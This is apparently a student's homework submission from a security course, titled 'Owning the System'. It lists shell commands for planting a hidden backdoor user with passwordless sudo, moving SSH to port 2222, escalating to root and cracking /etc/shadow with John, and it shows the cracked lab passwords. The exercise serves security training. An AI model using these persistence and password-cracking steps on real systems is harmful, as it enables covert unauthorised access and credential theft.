-
Notifications
You must be signed in to change notification settings - Fork 1
/
Submission File_
67 lines (46 loc) · 2.03 KB
/
Submission File_
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
Week 6 Homework Submission File: Advanced Bash - Owning the System
Please edit this file by adding the solution commands on the line below the prompt.
Save and submit the completed file for your homework submission.
Step 1: Shadow People
Create a secret user named sysd. Make sure this user doesn't have a home folder created:
Your solution command here - useradd -rMo -u 600 sysd
Give your secret user a password:
Your solution command here - passwd sysd
Give your secret user a system UID < 1000:
Your solution command here - usermod -u 600 sysd
Give your secret user the same GID:
Your solution command here - groupmod -g 600 sysd
System_ID
Give your secret user full sudo access without the need for a password:
Your solution command here - visudo sysd ALL=(ALL:ALL) NOPASSWD:ALL
Test that sudo access works without your password:
Your bash commands here - cat /etc/sudoers | grep -i sysd | awk '{ print $3 }'
Root_Access
Step 2: Smooth Sailing
Edit the sshd_config file:
Your bash commands here - sudo nano /etc/ssh/sshd_config
Step 3: Testing Your Configuration Update
Restart the SSH service:
Your solution command here - systemctl restart ssh.service
Exit the root account:
Your solution command here - exit
SSH to the target machine using your sysd account and port 2222:
Your solution command here - ssh [email protected] -p 2222
Use sudo to switch to the root user:
Your solution command here - sudo su
Step 4: Crack All the Passwords
SSH back to the system using your sysd account and port 2222:
Your solution command here - ssh [email protected] -p 2222
Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file:
unshadow /etc/passwd /etc/shadow > passwords.txt
Your solution command here - john passwords.txt
Loaded 8 password hashes with 8 different salts (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
computer (stallman)
freedom (babbage)
trustno1 (mitnik)
dragon (lovelace)
lakers (turing)
passw0rd (sysadmin)
Goodluck! (student)
p4ssw0rd (sysd)